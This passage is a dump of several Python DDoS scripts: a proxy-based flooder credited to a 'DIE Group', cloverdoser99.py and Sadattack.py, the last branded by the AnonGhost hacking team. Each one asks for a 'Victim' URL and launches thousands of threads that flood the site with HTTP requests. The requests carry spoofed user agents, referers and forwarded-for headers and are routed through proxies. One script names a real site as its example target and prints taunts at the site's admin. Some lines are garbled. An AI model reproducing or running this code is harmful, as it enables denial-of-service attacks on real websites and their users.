Version/7.1.0.346 Mobile Safari/534.11+", 36 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 37 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en-US) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.115 Mobile Safari/534.11+", 38 | "Mozilla/5.0 (BlackBerry; U; BlackBerry 9850; en) AppleWebKit/534.11+ (KHTML, like Gecko) Version/7.0.0.254 Mobile Safari/534.11+", 39 | "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7", 40 | "Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Comodo_Dragon/4.1.1.11 Chrome/4.1.249.1042 Safari/532.5", 41 | "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25", 42 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2", 43 | "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10", 44 | "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko ) Version/5.1 Mobile/9B176 Safari/7534.48.3", 45 | "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27",] 46 | 47 | reFerers = [ 48 | "https://w...content-available-to-author-only...m.vn/?gws_rd=ssl#q=", 49 | "http://y...content-available-to-author-only...x.ru/yandsearch?text=%D1%%D2%?=g.sql()81%..", 50 | "http://c...content-available-to-author-only...y.com/profile.php?redirect=", 51 | "http://w...content-available-to-author-only...y.com/search/results?q=", 52 | "http://y...content-available-to-author-only...x.ru/yandsearch?text=", 53 | "http://g...content-available-to-author-only...l.ru/search?mail.ru=1&q=", 54 | "http://n...content-available-to-author-only...r.ru/search?=btnG?=%D0?2?%D0?2?%=D0..", 55 | "http://r...content-available-to-author-only...a.org/wiki/%D0%9C%D1%8D%D1%x80_%D0%..", 56 | "http://r...content-available-to-author-only...o.com/search;_yzt=?=A7x9Q.bs67zf..", 57 | "http://r...content-available-to-author-only...o.com/search;?_query?=l%t=?=?A7x..", 58 | "http://g...content-available-to-author-only...l.ru/search?gay.ru.query=1&q=?abc.r..", 59 | "http://n...content-available-to-author-only...r.ru/search?btnG=%D0%9D%?D0%B0%D0%B..", 60 | "http://w...content-available-to-author-only...e.ru/url?sa=t&rct=?j&q=&e..", 61 | "http://h...content-available-to-author-only...u.com/searchResult?keywords=", 62 | "http://w...content-available-to-author-only...g.com/search?q=", 63 | "https://w...content-available-to-author-only...x.com/yandsearch?text=", 64 | "https://d...content-available-to-author-only...o.com/?q=", 65 | "http://w...content-available-to-author-only...k.com/web?q=", 66 | "http://s...content-available-to-author-only...l.com/aol/search?q=", 67 | "https://w...content-available-to-author-only...m.nl/vaste-onderdelen/zoeken/?zoeken_term=", 68 | "http://v...content-available-to-author-only...3.org/feed/check.cgi?url=", 69 | "http://h...content-available-to-author-only...r.com/check_page/?furl=", 70 | "http://w...content-available-to-author-only...r.com/url/translation.aspx?direction=er&sourceURL=", 71 | "http://j...content-available-to-author-only...3.org/css-validator/validator?uri=", 72 | "https://a...content-available-to-author-only...o.com/rss?url=", 73 | "http://e...content-available-to-author-only...l.com/search?q=", 74 | "https://s...content-available-to-author-only...y.com/market/search?q=", 75 | "http://f...content-available-to-author-only...o.com/search?q=", 76 | "http://w...content-available-to-author-only...t.com/site/pinterest.com/search?q=", 77 | "http://e...content-available-to-author-only...e.net/wow/en/search?q=", 78 | "http://e...content-available-to-author-only...l.com/search?q=", 79 | "http://c...content-available-to-author-only...n.org/search?q=", 80 | "http://t...content-available-to-author-only...t.edu/search?q=", 81 | "http://w...content-available-to-author-only...m.tv/search?q=", 82 | "http://w...content-available-to-author-only...d.com/search?q=", 83 | "http://f...content-available-to-author-only...a.com/search?q=", 84 | "http://i...content-available-to-author-only...h.io/search?q=", 85 | "http://j...content-available-to-author-only...s.com/jobs/search?q=", 86 | "http://t...content-available-to-author-only...p.org/search?q=", 87 | "http://w...content-available-to-author-only...m.vn/news/vn/search&q=", 88 | "https://play.google.com/store/search?q=", 89 | "http://w...content-available-to-author-only...s.gov/@@tceq-search?q=", 90 | "http://w...content-available-to-author-only...t.com/search?q=", 91 | "http://w...content-available-to-author-only...r.com/events/search?q=", 92 | "https://c...content-available-to-author-only...e.org/search?q=", 93 | "http://j...content-available-to-author-only...s.com/search?q=", 94 | "http://j...content-available-to-author-only...g.com/search?q=", 95 | "https://w...content-available-to-author-only...t.com/search/?q=", 96 | "http://m...content-available-to-author-only...r.org/search?q=", 97 | "https://w...content-available-to-author-only...s.com/search?q=", 98 | "http://w...content-available-to-author-only...s.uk/search?q=", 99 | "http://w...content-available-to-author-only...q.com/search?q="] 100 | 101 | keyWords = [ 102 | "sex", 103 | "World Cup", 104 | "Singer", 105 | "ISIS", 106 | "DIE Group", 107 | "JCAlex Min", 108 | "Facebook", 109 | "Anonymous"] 110 | 111 | def randomIp(): 112 | random.seed() 113 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' 114 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 115 | return result 116 | 117 | def randomIpList(): 118 | random.seed() 119 | res = "" 120 | for ip in xrange(random.randint(2, 8)): 121 | res = res + randomIp() + ", " 122 | return res[0:len(res) - 2] 123 | 124 | def randomUserAgent(): 125 | return random.choice(userAgents) 126 | 127 | def randomReFerer(): 128 | return random.choice(reFerers) 129 | 130 | def randomKeyWord(): 131 | return random.choice(keyWords) 132 | 133 | class attacco(threading.Thread): 134 | def run(self): 135 | current = x 136 | 137 | if current < len(listaproxy): 138 | proxy = listaproxy[current].split(':') 139 | else: 140 | proxy = random.choice(listaproxy).split(':') 141 | 142 | useragent = "User-Agent: " + randomUserAgent() + "\r\n" 143 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 144 | referer = "Referer: "+ randomReFerer() + randomKeyWord() + "\r\n" 145 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 146 | 147 | while nload: 148 | time.sleep(1) 149 | 150 | while 1: 151 | try: 152 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 153 | a.connect((proxy[0], int(proxy[1]))) 154 | a.send(httprequest) 155 | try: 156 | for i in xrange(3): 157 | a.send(httprequest) 158 | except: 159 | tts = 1 160 | 161 | 162 | except: 163 | proxy = random.choice(listaproxy).split(':') 164 | 165 | 166 | 167 | #Main 168 | print(" .----. JCAlex Min and KitHulk - DIE Group .----. ") 169 | print("»------(.:. DDOS/DOS With Proxy List.:.)------»") 170 | 171 | # Site 172 | url = raw_input("Victim: ") 173 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 174 | 175 | #Proxy 176 | in_file = open(raw_input("File proxy: "),"r") 177 | proxyf = in_file.read() 178 | in_file.close() 179 | 180 | listaproxy = proxyf.split('\n') 181 | #So luong 182 | thread = input("So luong (1000): ") 183 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 184 | accept = "Accept-Encoding: gzip, deflate\r\n" 185 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 186 | nload = 1 187 | x = 0 188 | 189 | for x in xrange(thread): 190 | attacco().start() 191 | time.sleep(0.003) 192 | print "Dang chuan bi luong Ddos " + str(x) + "!" 193 | print "Dang Bat Dau Tan Cong..." 194 | nload = 0 195 | while not nload: 196 | time.sleep(1) -------------------------------------------------------------------------------- /cloverdoser99.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | #coding: utf-8 4 | 5 | #...:> XirusTeam <:... 6 | 7 | 8 | 9 | import random 10 | 11 | import socket 12 | 13 | import threading 14 | 15 | import time 16 | 17 | import datetime 18 | 19 | import urllib2 20 | 21 | import urllib 22 | 23 | import re 24 | 25 | import sys 26 | 27 | import optparse 28 | 29 | import os 30 | 31 | import urlparse 32 | 33 | 34 | 35 | # Mod By H?i DDOS 36 | 37 | url='' 38 | 39 | host='' 40 | 41 | headers_useragents=[] 42 | 43 | headers_referers=[] 44 | 45 | keyword_top=[] 46 | 47 | request_counter=0 48 | 49 | flag=0 50 | 51 | safe=0 52 | 53 | def inc_counter(): 54 | 55 | global request_counter 56 | 57 | request_counter+=1 58 | 59 | 60 | 61 | def set_flag(val): 62 | 63 | global flag 64 | 65 | flag=val 66 | 67 | 68 | 69 | def set_safe(): 70 | 71 | global safe 72 | 73 | safe=1 74 | 75 | 76 | 77 | def getUserAgent(): 78 | 79 | platform = random.choice(['Macintosh', 'Windows', 'X11']) 80 | 81 | if platform == 'Macintosh': 82 | 83 | os = random.choice(['68K', 'PPC']) 84 | 85 | elif platform == 'Windows': 86 | 87 | os = random.choice(['Win3.11', 'WinNT3.51', 'WinNT4.0', 'Windows NT 5.0', 'Windows NT 5.1', 'Windows NT 5.2', 'Windows NT 6.0', 'Windows NT 6.1', 'Windows NT 6.2', 'Win95', 'Win98', 'Win 9x 4.90', 'WindowsCE', 'Windows 7', 'Windows 8']) 88 | 89 | elif platform == 'X11': 90 | 91 | os = random.choice(['Linux i686', 'Linux x86_64']) 92 | 93 | browser = random.choice(['chrome', 'firefox', 'ie']) 94 | 95 | if browser == 'chrome': 96 | 97 | webkit = str(random.randint(10000, 20000)) 98 | 99 | version = str(random.randint(0, 28)) + '.0' + str(random.randint(0, 50000)) + '.' + str(random.randint(0, 49999)) 100 | 101 | return 'Mozilla/5.0 (' + os + ') AppleWebKit/' + webkit + '.0 (KHTML, like Gecko) Chrome/' + version + ' Safari/' + webkit 102 | 103 | elif browser == 'firefox': 104 | 105 | currentYear = datetime.date.today().year 106 | 107 | year = str(random.randint(2000, currentYear)) 108 | 109 | month = random.randint(1, 12) 110 | 111 | if month < 10: 112 | 113 | month = '0' + str(month) 114 | 115 | else: 116 | 117 | month = str(month) 118 | 119 | day = random.randint(1, 300) 120 | 121 | if day < 10: 122 | 123 | day = '0' + str(day) 124 | 125 | else: 126 | 127 | day = str(day) 128 | 129 | gecko = year + month + day 130 | 131 | version = str(random.randint(1, 21)) + '.0' 132 | 133 | return 'Mozilla/5.0 (' + os + '; rv:' + version + ') Gecko/' + gecko + ' Firefox/' + version 134 | 135 | elif browser == 'ie': 136 | 137 | version = str(random.randint(1, 10)) + '.0' 138 | 139 | engine = str(random.randint(1, 5)) + '.0' 140 | 141 | option = random.choice([True, False]) 142 | 143 | if option == True: 144 | 145 | token = random.choice(['.NET CLR', 'SV1', 'Tablet PC', 'Win64; IA64', 'Win64; x64', 'WOW64']) + '; ' 146 | 147 | else: 148 | 149 | token = '' 150 | 151 | return 'Mozilla/5.0 (compatible; MSIE ' + version + '; ' + os + '; ' + token + 'Trident/' + engine + ')' 152 | 153 | 154 | 155 | def referer_list(): 156 | 157 | global headers_referers 158 | 159 | headers_referers.append('https://www.facebook.com/sharer/sharer.php?u=https://www.facebook.com/sharer/sharer.php?u=') 160 | 161 | headers_referers.append('http://www.google.com/?q=') 162 | 163 | headers_referers.append('https://www.facebook.com/l.php?u=https://www.facebook.com/l.php?u=') 164 | 165 | headers_referers.append('https://drive.google.com/viewerng/viewer?url=') 166 | 167 | headers_referers.append('http://www.google.com/translate?u=') 168 | 169 | headers_referers.append('https://developers.google.com/speed/pagespeed/insights/?url=') 170 | 171 | headers_referers.append('http://help.baidu.com/searchResult?keywords=') 172 | 173 | headers_referers.append('http://www.bing.com/search?q=') 174 | 175 | headers_referers.append('https://add.my.yahoo.com/rss?url=') 176 | 177 | headers_referers.append('https://play.google.com/store/search?q=') 178 | 179 | return(headers_referers) 180 | 181 | 182 | 183 | def keyword_list(): 184 | 185 | global keyword_top 186 | 187 | keyword_top.append('Sex') 188 | 189 | keyword_top.append('Robin Williams') 190 | 191 | keyword_top.append('World Cup') 192 | 193 | keyword_top.append('Ca Si Le Roi') 194 | 195 | keyword_top.append('Ebola') 196 | 197 | keyword_top.append('Malaysia Airlines Flight 370') 198 | 199 | keyword_top.append('ALS Ice Bucket Challenge') 200 | 201 | keyword_top.append('Flappy Bird') 202 | 203 | keyword_top.append('Conchita Wurst') 204 | 205 | keyword_top.append('ISIS') 206 | 207 | keyword_top.append('Frozen') 208 | 209 | keyword_top.append('014 Sochi Winter Olympics') 210 | 211 | keyword_top.append('IPhone') 212 | 213 | keyword_top.append('Samsung Galaxy S5') 214 | 215 | keyword_top.append('Nexus 6') 216 | 217 | keyword_top.append('Moto G') 218 | 219 | keyword_top.append('Samsung Note 4') 220 | 221 | keyword_top.append('LG G3') 222 | 223 | keyword_top.append('Xbox One') 224 | 225 | keyword_top.append('Apple Watch') 226 | 227 | keyword_top.append('Nokia X') 228 | 229 | keyword_top.append('Ipad Air') 230 | 231 | keyword_top.append('Facebook') 232 | 233 | keyword_top.append('Anonymous') 234 | 235 | return(keyword_top) 236 | 237 | 238 | 239 | def buildblock(size): 240 | 241 | out_str = '' 242 | 243 | for i in range(0, size): 244 | 245 | a = random.randint(65, 90) 246 | 247 | out_str += chr(a) 248 | 249 | return(out_str) 250 | 251 | 252 | 253 | def httpcall(url): 254 | 255 | referer_list() 256 | 257 | code=0 258 | 259 | if url.count("?")>0: 260 | 261 | param_joiner = "&" 262 | 263 | else: 264 | 265 | param_joiner = "?" 266 | 267 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 268 | 269 | request.add_header('User-Agent', getUserAgent()) 270 | 271 | request.add_header('Cache-Control', 'no-cache') 272 | 273 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 274 | 275 | request.add_header('Referer', random.choice(headers_referers) + host + buildblock(random.randint(5,10))) 276 | 277 | request.add_header('Keep-Alive', random.randint(110,120)) 278 | 279 | request.add_header('Connection', 'keep-alive') 280 | 281 | request.add_header('Host',host) 282 | 283 | 284 | 285 | index = random.randint(0,len(listaproxy)-1) 286 | 287 | proxy = urllib2.ProxyHandler({'http':listaproxy[index]}) 288 | 289 | opener = urllib2.build_opener(proxy,urllib2.HTTPHandler) 290 | 291 | urllib2.install_opener(opener) 292 | 293 | try: 294 | 295 | urllib2.urlopen(request) 296 | 297 | if(flag==1): set_flag(0) 298 | 299 | if(code==500): code=0 300 | 301 | except urllib2.HTTPError, e: 302 | 303 | set_flag(1) 304 | 305 | code=500 306 | 307 | time.sleep(60) 308 | 309 | except urllib2.URLError, e: 310 | 311 | sys.exit() 312 | 313 | else: 314 | 315 | inc_counter() 316 | 317 | urllib2.urlopen(request) 318 | 319 | return(code) 320 | 321 | 322 | 323 | class HTTPThread(threading.Thread): 324 | 325 | def run(self): 326 | 327 | try: 328 | 329 | while flag<2: 330 | 331 | code=httpcall(url) 332 | 333 | if (code==500) & (safe==1): 334 | 335 | set_flag(2) 336 | 337 | except Exception, ex: 338 | 339 | pass 340 | 341 | 342 | 343 | class MonitorThread(threading.Thread): 344 | 345 | def run(self): 346 | 347 | previous=request_counter 348 | 349 | while flag==0: 350 | 351 | if (previous+100request_counter): 352 | 353 | previous=request_counter 354 | 355 | if flag==2: 356 | 357 | print '' 358 | 359 | 360 | 361 | #DIE_v8 Mod By JokerLjnk 362 | 363 | def randomIp(): 364 | 365 | random.seed() 366 | 367 | result = str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 368 | 369 | result = result + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) 370 | 371 | return result 372 | 373 | 374 | 375 | def randomIpList(): 376 | 377 | random.seed() 378 | 379 | res = "" 380 | 381 | for ip in xrange(random.randint(8, 10)): 382 | 383 | res = res + randomIp() + ", " 384 | 385 | return res[0:len(res) - 2] 386 | 387 | class attacco(threading.Thread): 388 | 389 | def run(self): 390 | 391 | referer_list() 392 | 393 | current = x 394 | 395 | 396 | 397 | if current < len(listaproxy): 398 | 399 | proxy = listaproxy[current].split(':') 400 | 401 | else: 402 | 403 | proxy = random.choice(listaproxy).split(':') 404 | 405 | 406 | 407 | useragent = "User-Agent: " + getUserAgent() + "\r\n" 408 | 409 | forward = "X-Forwarded-For: " + randomIpList() + "\r\n" 410 | 411 | referer = "Referer: "+ random.choice(headers_referers) + url + "?r="+ str(random.randint(1, 1500)) + "\r\n" 412 | 413 | httprequest = get_host + useragent + referer + accept + forward + connection + "\r\n" 414 | 415 | 416 | 417 | while nload: 418 | 419 | time.sleep(1) 420 | 421 | pass 422 | 423 | 424 | 425 | while 1: 426 | 427 | try: 428 | 429 | a = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 430 | 431 | a.connect((proxy[0], int(proxy[1]))) 432 | 433 | a.send(httprequest) 434 | 435 | try: 436 | 437 | for i in xrange(4): 438 | 439 | a.send(httprequest) 440 | 441 | except: 442 | 443 | tts = 1 444 | 445 | 446 | 447 | 448 | 449 | except: 450 | 451 | proxy = random.choice(listaproxy).split(':') 452 | 453 | 454 | 455 | #Main 456 | 457 | print '\n\t..:: > Code Mod H?i DDOS < ::..' 458 | 459 | print '\t ==> #~~ DDOS-Webstie ~~# <== ' 460 | 461 | # Site 462 | 463 | url = raw_input("Victim: ") 464 | 465 | host_url = url.replace("http://", "").replace("https://", "").split('/')[0] 466 | 467 | #Proxy 468 | 469 | in_file = open(raw_input("File proxy: "),"r") 470 | 471 | proxyf = in_file.read() 472 | 473 | 474 | 475 | 476 | 477 | in_file.close() 478 | 479 | listaproxy = proxyf.split('\n') 480 | 481 | #So luong 482 | 483 | thread = input("So luong (5000): ") 484 | 485 | get_host = "GET " + url + " HTTP/1.1\r\nHost: " + host_url + "\r\n" 486 | 487 | accept = "Accept-Encoding: gzip, deflate\r\n" 488 | 489 | connection = "Connection: Keep-Alive, Persist\r\nProxy-Connection: keep-alive\r\n" 490 | 491 | nload = 1 492 | 493 | x = 0 494 | 495 | print("\Code md by cloverdoser") 496 | 497 | if url.count("/")==2: 498 | 499 | url = url + "/" 500 | 501 | m = re.search('http\://([^/]*)/?.*', url) 502 | 503 | host = m.group(1) 504 | 505 | for x in xrange(int(thread + 1)): 506 | 507 | attacco().start() 508 | 509 | time.sleep(0.003) 510 | 511 | 512 | 513 | print "Attacking <====> -_- <===>" 514 | 515 | for x in xrange(501): 516 | 517 | t = HTTPThread() 518 | 519 | t.start() 520 | 521 | t = MonitorThread() 522 | 523 | t.start() 524 | 525 | nload = 0 526 | 527 | while not nload: 528 | 529 | time.sleep(1) -------------------------------------------------------------------------------- /Sadattack.py: -------------------------------------------------------------------------------- 1 | #4312644bf54db17180c8a95add9fdc06####-->uauauauauauauau 2 | #9dfb17e500b557a9d985c08da4fd0aaf#####--->We will fuck your site D: 3 | #5afc3c0f68ff47b53b485fcd53e898a9######---->SadAttack :( 4 | #ff46a6b3100d11c29d4233c72f604a10#####--->uauauauauauau 5 | #6e70e3b1bf171ae14505f4f8b0dc4e5a####--> 6 | ####################################-> 7 | #https://www.youtube.com/watch?v=Aps4ZczffVw# 8 | #Allahu Akbar!# 9 | 10 | 11 | import urllib2 12 | import sys 13 | import threading 14 | import random 15 | import re 16 | 17 | #global params 18 | url='' ############################### 19 | host='' #~~~~Created By Hax Stroke~~~~# 20 | headers_useragents=[] #~~~~~~~~~~@FollowMe~~~~~~~~~~# 21 | headers_referers=[] #fb.com/anonghostsoldierstroke# 22 | request_counter=0 #~~~youtube.com/c/HaXStroKE~~~# 23 | flag=0 #~~~~~Twitter:@HaxStroKE~~~~~~# 24 | safe=0 ############################### 25 | 26 | def inc_counter(): 27 | global request_counter 28 | request_counter+=45 29 | 30 | def set_flag(val): 31 | global flag 32 | flag=val 33 | 34 | def set_safe(): 35 | global safe 36 | safe=1 37 | 38 | # generates a user agent array 39 | def useragent_list(): 40 | global headers_useragents 41 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1 Safari/62439616.534') 42 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') 43 | headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') 44 | headers_useragents.append('Mozilla/5.0 (PlayStation 4 1.52) AppleWebKit/536.26 (KHTML, like Gecko)') 45 | headers_useragents.append('Mozilla/5.0 (Windows NT 6.1; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') 46 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)') 47 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)') 48 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)') 49 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)') 50 | headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)') 51 | headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)') 52 | headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51') 53 | return(headers_useragents) 54 | 55 | # generates a referer array 56 | def referer_list(): 57 | global headers_referers 58 | headers_referers.append('http://www.google.com/?q=') ############################ 59 | headers_referers.append('http://www.usatoday.com/search/results?q=') #Pre-configured # 60 | headers_referers.append('http://engadget.search.aol.com/search?q=') #Botnets # 61 | headers_referers.append('http://www.google.com/?q=') #Infected's Websites # 62 | headers_referers.append('http://www.usatoday.com/search/results?q=') #Best's Shells Only # 63 | headers_referers.append('http://engadget.search.aol.com/search?q=') #All uploaded by Hax Stroke# 64 | headers_referers.append('http://www.bing.com/search?q=') #From AnonGhost Team # 65 | headers_referers.append('http://search.yahoo.com/search?p=') ############################ 66 | headers_referers.append('http://www.ask.com/web?q=') 67 | headers_referers.append('http://search.lycos.com/web/?q=') 68 | headers_referers.append('http://busca.uol.com.br/web/?q=') 69 | headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') 70 | headers_referers.append('http://www.dmoz.org/search/search?q=') 71 | headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') 72 | headers_referers.append('http://yandex.ru/yandsearch?text=') 73 | headers_referers.append('http://www.zhongsou.com/third?w=') 74 | headers_referers.append('http://hksearch.timway.com/search.php?query=') 75 | headers_referers.append('http://find.ezilon.com/search.php?q=') 76 | headers_referers.append('http://www.sogou.com/web?query=') 77 | headers_referers.append('http://api.duckduckgo.com/html/?q=') 78 | headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') 79 | 80 | # generates a Keyword list 81 | def keyword_list(): 82 | global keyword_top 83 | keyword_top.append('HaxStroke') 84 | keyword_top.append('Suicide') 85 | keyword_top.append('Sex') 86 | keyword_top.append('Robin Williams') 87 | keyword_top.append('World Cup') 88 | keyword_top.append('Ca Si Le Roi') 89 | keyword_top.append('Ebola') 90 | keyword_top.append('Malaysia Airlines Flight 370') 91 | keyword_top.append('ALS Ice Bucket Challenge') 92 | keyword_top.append('Flappy Bird') 93 | keyword_top.append('Conchita Wurst') 94 | keyword_top.append('ISIS') 95 | keyword_top.append('Frozen') 96 | keyword_top.append('014 Sochi Winter Olympics') 97 | keyword_top.append('IPhone') 98 | keyword_top.append('Samsung Galaxy S5') 99 | keyword_top.append('Nexus 6') 100 | keyword_top.append('Moto G') 101 | keyword_top.append('Samsung Note 4') 102 | keyword_top.append('LG G3') 103 | keyword_top.append('Xbox One') 104 | keyword_top.append('Apple Watch') 105 | keyword_top.append('Nokia X') 106 | keyword_top.append('Ipad Air') 107 | keyword_top.append('Facebook') 108 | keyword_top.append('Anonymous') 109 | keyword_top.append('DJ Bach') 110 | 111 | headers_referers.append('http://' + host + '/') 112 | return(headers_referers) 113 | 114 | #builds random ascii string 115 | def buildblock(size): 116 | out_str = '' 117 | for i in range(0, size): 118 | a = random.randint(65, 160) 119 | out_str += chr(a) 120 | return(out_str) 121 | 122 | def usage(): 123 | print 'SadAttack Version 2.0 DDoS Tool Created By Hax Stroke ' 124 | print 'AnonGhost Team Page: http://facebook.com/anonghost.sec' 125 | print 'New loaded Botnets: 39,445,657' 126 | print 'Usage: SadAttack (url)' 127 | print 'Example: Sadattack.py http://luthi.co.il/' 128 | print "\a" 129 | print \ 130 | """ 131 | ################### 132 | ###!!!!!!!!!!!!!!!!!!!#### 133 | ###!!!!!!!!!!!!!!!!!!!!!!!!!#### 134 | ##!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!### 135 | ###!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!### 136 | ##!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!### 137 | ##!!!!!!!!!#####!!!!!!!!!!!#####!!!!!!!!!## 138 | ##!!!!!!!!!!######!!!!!!!!!!######!!!!!!!!!## 139 | ##!!!!!!!!!!!####!!!!!!!!!!!!####!!!!!!!!!!!## 140 | ##!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!## 141 | ##!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!## 142 | ##!!!!!!!!!!!!!!!!!!!!####!!!!!!!!!!!!!!!!!!!!## 143 | ##!!!!!!!!!!!!!!!###############!!!!!!!!!!!!!!## 144 | ##!!!!!!!!!!!!####!!!!!!!!!!!#####!!!!!!!!!!!## 145 | ###!!!!!!!!!###!!!!!!!!!!!!!!!!!!##!!!!!!!!!!## 146 | ##!!!!!!!!!#!!!!!!!!!!!!!!!!!!!!!!##!!!!!!!!## 147 | ###!!!!!!#!!!!!!!!!!!!!!!!!!!!!!!!##!!!!!!!## 148 | ###!!!!!#!!!!!!!!!!!!!!!!!!!!!!!!!##!!!!!## 149 | ###!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!## 150 | ###!!!!!!!!!!!!!!!!!!!!!Hax!!Stroke## 151 | ###!!!!!!!!!!!!!!AnonGhost!Team## 152 | ####!!!!!!!!!!!!!SadAttacK### 153 | ####!!!!!!!!!!!!!!!!!### 154 | ################# 155 | _________________________________________________________________ 156 | 157 | ################## Smoking loud I'm a lonely cloud 158 | #SadBoys 2001 # I'm a lonely cloud, with my windows down 159 | #Yoshi city # I'm a lonely, lonely, I'm a lonely, lonely 160 | ################## I'm a lonely, lonely, I'm a lonely, lonely 161 | 162 | Music : https://www.youtube.com/watch?v=iX1a3JngmpI 163 | _________________________________________________________________ 164 | """ 165 | 166 | 167 | #http request 168 | def httpcall(url): 169 | useragent_list() 170 | referer_list() 171 | code=0 172 | if url.count("?")>0: 173 | param_joiner="&" 174 | else: 175 | param_joiner="?" 176 | request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10))) 177 | request.add_header('User-Agent', random.choice(headers_useragents)) 178 | request.add_header('Cache-Control', 'no-cache') 179 | request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7') 180 | request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(50,100))) 181 | request.add_header('Keep-Alive', random.randint(110,160)) 182 | request.add_header('Connection', 'keep-alive') 183 | request.add_header('Host',host) 184 | try: 185 | urllib2.urlopen(request) 186 | except urllib2.HTTPError, e: 187 | #print e.code 188 | set_flag(1) 189 | print ' ' 190 | print '#~~~~~~~> We Are AnonGhost <~~~~~~~~#~~~>Welcome for the sadness<~~#' 191 | print '#~~~~~~> Belong your database <~~~~~#~~~~~~~~~>Hello admin<~~~~~~~~#' 192 | print '#~~~~~~> Fuck your Firewall <~~~~~~~#~~~~>your website is down<~~~~#' 193 | print '#~~~> Your website will be down <~~~#~~~>By SadAttack Mass DDoS<~~~#' 194 | print ' ' 195 | code=500 196 | except urllib2.URLError, e: 197 | #print e.reason 198 | sys.exit() 199 | else: 200 | inc_counter() 201 | urllib2.urlopen(request) 202 | return(code) 203 | 204 | 205 | #http caller thread 206 | class HTTPThread(threading.Thread): 207 | def run(self): 208 | try: 209 | while flag<2: 210 | code=httpcall(url) 211 | if (code==500) & (safe==1): 212 | set_flag(2) 213 | except Exception, ex: 214 | pass 215 | 216 | # monitors http threads and counts requests 217 | class MonitorThread(threading.Thread): 218 | def run(self): 219 | previous=request_counter 220 | while flag==0: 221 | if (previous+150request_counter): 222 | print "#~~~>Sad DDoS Attack's Sended: %d Sending more<~~~#" % (request_counter) 223 | previous=request_counter 224 | if flag==2: 225 | print "\n ~>Stopping the mass DDoS Attack<~" 226 | 227 | #execute 228 | if len(sys.argv) < 2: 229 | usage() 230 | sys.exit() 231 | else: 232 | if sys.argv[1]=="help": 233 | usage() 234 | sys.exit() 235 | else: 236 | print "Starting the Sadness in webserver Sad DDoS Tool" 237 | print "Created By Hax Stroke" 238 | if len(sys.argv)== 3: 239 | if sys.argv[2]=="safe": 240 | set_safe() 241 | url = 